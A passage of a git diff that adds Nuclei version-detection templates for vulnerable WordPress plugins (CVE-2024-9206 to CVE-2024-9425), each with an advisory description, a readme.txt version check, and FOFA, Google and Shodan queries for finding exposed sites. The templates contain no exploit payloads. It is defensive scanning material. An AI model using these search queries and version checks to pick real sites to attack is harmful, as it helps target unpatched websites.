cve,wordpress,wp-plugin,sendpulse-web-push,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sendpulse-web-push/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sendpulse-web-push" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml b/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml new file mode 100644 index 0000000000..7a12de9eb8 --- /dev/null +++ b/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff + +info: + name: > + MAS Companies For WP Job Manager <= 1.0.13 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MAS Companies For WP Job Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9206 + metadata: + fofa-query: "wp-content/plugins/mas-wp-job-manager-company/" + google-query: inurl:"/wp-content/plugins/mas-wp-job-manager-company/" + shodan-query: 'vuln:CVE-2024-9206' + tags: cve,wordpress,wp-plugin,mas-wp-job-manager-company,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mas-wp-job-manager-company/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mas-wp-job-manager-company" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9213.yaml b/poc/cve/CVE-2024-9213.yaml new file mode 100644 index 0000000000..a5af341012 --- /dev/null +++ b/poc/cve/CVE-2024-9213.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9213 + +info: + name: > + Persian WooCommerce SMS <= 7.0.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The افزونه پیامک ووکامرس Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8845d56-2e8a-472a-bc32-e26b388ce58d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9213 + metadata: + fofa-query: "wp-content/plugins/persian-woocommerce-sms/" + google-query: inurl:"/wp-content/plugins/persian-woocommerce-sms/" + shodan-query: 'vuln:CVE-2024-9213' + tags: cve,wordpress,wp-plugin,persian-woocommerce-sms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/persian-woocommerce-sms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "persian-woocommerce-sms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9215.yaml b/poc/cve/CVE-2024-9215.yaml new file mode 100644 index 0000000000..d0769e17da --- /dev/null +++ b/poc/cve/CVE-2024-9215.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9215 + +info: + name: > + Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors <= 4.7.1 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary User Email Update and Account Takeover + author: topscoder + severity: low + description: > + The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to Insecure Direct Object Reference to Privilege Escalation/Account Takeover in all versions up to, and including, 4.7.1 via the action_edited_author() due to missing validation on the 'authors-user_id' user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update arbitrary user accounts email addresses, including administrators, which can then be leveraged to reset that user's account password and gain access. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0506137-82e3-4988-9b23-370465a866c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-9215 + metadata: + fofa-query: "wp-content/plugins/publishpress-authors/" + google-query: inurl:"/wp-content/plugins/publishpress-authors/" + shodan-query: 'vuln:CVE-2024-9215' + tags: cve,wordpress,wp-plugin,publishpress-authors,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/publishpress-authors/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "publishpress-authors" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9240.yaml b/poc/cve/CVE-2024-9240.yaml new file mode 100644 index 0000000000..f5dfb3a62a --- /dev/null +++ b/poc/cve/CVE-2024-9240.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9240 + +info: + name: > + ReDi Restaurant Reservation <= 24.0902 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The ReDi Restaurant Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 24.0902. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9240 + metadata: + fofa-query: "wp-content/plugins/redi-restaurant-reservation/" + google-query: inurl:"/wp-content/plugins/redi-restaurant-reservation/" + shodan-query: 'vuln:CVE-2024-9240' + tags: cve,wordpress,wp-plugin,redi-restaurant-reservation,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/redi-restaurant-reservation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "redi-restaurant-reservation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 24.0902') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9263.yaml b/poc/cve/CVE-2024-9263.yaml new file mode 100644 index 0000000000..667321ffa3 --- /dev/null +++ b/poc/cve/CVE-2024-9263.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9263 + +info: + name: > + WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin <= 1.0.25 - Insecure Direct Object Reference to Unauthenticated Arbitrary User Password/Email Reset/Account Takeover + author: topscoder + severity: critical + description: > + The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to Account Takeover/Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 1.0.25 via the save() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to reset the emails and passwords of arbitrary user accounts, including administrators, which makes account takeover and privilege escalation possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9263 + metadata: + fofa-query: "wp-content/plugins/timetics/" + google-query: inurl:"/wp-content/plugins/timetics/" + shodan-query: 'vuln:CVE-2024-9263' + tags: cve,wordpress,wp-plugin,timetics,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/timetics/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "timetics" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.25') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9347.yaml b/poc/cve/CVE-2024-9347.yaml new file mode 100644 index 0000000000..8ef03bfb38 --- /dev/null +++ b/poc/cve/CVE-2024-9347.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9347 + +info: + name: > + The Ultimate WordPress Toolkit – WP Extended <= 3.0.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpext-export' parameter in all versions up to, and including, 3.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9347 + metadata: + fofa-query: "wp-content/plugins/wpextended/" + google-query: inurl:"/wp-content/plugins/wpextended/" + shodan-query: 'vuln:CVE-2024-9347' + tags: cve,wordpress,wp-plugin,wpextended,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpextended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpextended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml b/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml new file mode 100644 index 0000000000..9a255ce053 --- /dev/null +++ b/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9350-46f7941cec982659947867d1e8ef96f4 + +info: + name: > + DPD Baltic Shipping <= 1.2.83 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The DPD Baltic Shipping plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_value' parameter in all versions up to, and including, 1.2.83 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9350 + metadata: + fofa-query: "wp-content/plugins/woo-shipping-dpd-baltic/" + google-query: inurl:"/wp-content/plugins/woo-shipping-dpd-baltic/" + shodan-query: 'vuln:CVE-2024-9350' + tags: cve,wordpress,wp-plugin,woo-shipping-dpd-baltic,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-shipping-dpd-baltic/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-shipping-dpd-baltic" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.83') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9351.yaml b/poc/cve/CVE-2024-9351.yaml new file mode 100644 index 0000000000..f4cf270125 --- /dev/null +++ b/poc/cve/CVE-2024-9351.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9351 + +info: + name: > + Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.35.1 - Cross-Site Request Forgery to Draft Quiz Creation + author: topscoder + severity: medium + description: > + The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the quiz 'create_module' function. This makes it possible for unauthenticated attackers to create draft quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9351 + metadata: + fofa-query: "wp-content/plugins/forminator/" + google-query: inurl:"/wp-content/plugins/forminator/" + shodan-query: 'vuln:CVE-2024-9351' + tags: cve,wordpress,wp-plugin,forminator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "forminator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.35.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9352.yaml b/poc/cve/CVE-2024-9352.yaml new file mode 100644 index 0000000000..4501aa5899 --- /dev/null +++ b/poc/cve/CVE-2024-9352.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9352 + +info: + name: > + Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.35.1 - Cross-Site Request Forgery to Draft Custom Form Creation + author: topscoder + severity: medium + description: > + The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the custom form 'create_module' function. This makes it possible for unauthenticated attackers to create draft forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9352 + metadata: + fofa-query: "wp-content/plugins/forminator/" + google-query: inurl:"/wp-content/plugins/forminator/" + shodan-query: 'vuln:CVE-2024-9352' + tags: cve,wordpress,wp-plugin,forminator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "forminator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.35.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml b/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml new file mode 100644 index 0000000000..c324f69754 --- /dev/null +++ b/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9361-ae08a2363aeae9e478390a36b3137512 + +info: + name: > + Bulk images optimizer: Resize, optimize, convert to webp, rename ... <= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update + author: topscoder + severity: low + description: > + The Bulk images optimizer: Resize, optimize, convert to webp, rename … plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_configuration' function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9361 + metadata: + fofa-query: "wp-content/plugins/bulk-image-resizer/" + google-query: inurl:"/wp-content/plugins/bulk-image-resizer/" + shodan-query: 'vuln:CVE-2024-9361' + tags: cve,wordpress,wp-plugin,bulk-image-resizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-image-resizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-image-resizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml b/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml new file mode 100644 index 0000000000..c859ab6ffe --- /dev/null +++ b/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9364-247afd95e97573e50cc26fa4abafe629 + +info: + name: > + SendGrid for WordPress <= 1.4 - Missing Authorization to Authenticated (Subscriber+) Log Deletion + author: topscoder + severity: low + description: > + The SendGrid for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_mailplus_clear_logs' function in all versions up to, and including, 1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's log files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9364 + metadata: + fofa-query: "wp-content/plugins/wp-sendgrid-mailer/" + google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/" + shodan-query: 'vuln:CVE-2024-9364' + tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-sendgrid-mailer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml b/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml new file mode 100644 index 0000000000..d07d5d5a96 --- /dev/null +++ b/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83 + +info: + name: > + Easy Menu Manager | WPZest <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Easy Menu Manager | WPZest plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f60df43a-eef3-449d-96fd-b26e28361f81?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9366 + metadata: + fofa-query: "wp-content/plugins/easy-menu-manager-wpzest/" + google-query: inurl:"/wp-content/plugins/easy-menu-manager-wpzest/" + shodan-query: 'vuln:CVE-2024-9366' + tags: cve,wordpress,wp-plugin,easy-menu-manager-wpzest,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-menu-manager-wpzest/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-menu-manager-wpzest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml b/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml new file mode 100644 index 0000000000..ded2c085c2 --- /dev/null +++ b/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9373-21279f27679fbe0272aa43186143715d + +info: + name: > + Elemenda <= 0.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Elemenda plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9373 + metadata: + fofa-query: "wp-content/plugins/elemenda/" + google-query: inurl:"/wp-content/plugins/elemenda/" + shodan-query: 'vuln:CVE-2024-9373' + tags: cve,wordpress,wp-plugin,elemenda,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elemenda/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elemenda" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml b/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml new file mode 100644 index 0000000000..e9f932e670 --- /dev/null +++ b/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d + +info: + name: > + Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9382 + metadata: + fofa-query: "wp-content/plugins/gantry/" + google-query: inurl:"/wp-content/plugins/gantry/" + shodan-query: 'vuln:CVE-2024-9382' + tags: cve,wordpress,wp-plugin,gantry,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gantry" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.21') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml b/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml new file mode 100644 index 0000000000..db88722116 --- /dev/null +++ b/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73 + +info: + name: > + Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Parcel Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9383 + metadata: + fofa-query: "wp-content/plugins/woo-parcel-pro/" + google-query: inurl:"/wp-content/plugins/woo-parcel-pro/" + shodan-query: 'vuln:CVE-2024-9383' + tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-parcel-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml b/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml new file mode 100644 index 0000000000..50c8ed69e0 --- /dev/null +++ b/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9425-9969523487d164f3223d1b2ba16294e0 + +info: + name: > + Advanced Category and Custom Taxonomy Image <= 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via ad_tax_image Shortcode + author: topscoder + severity: low + description: > + The Advanced Category and Custom Taxonomy Image plugin 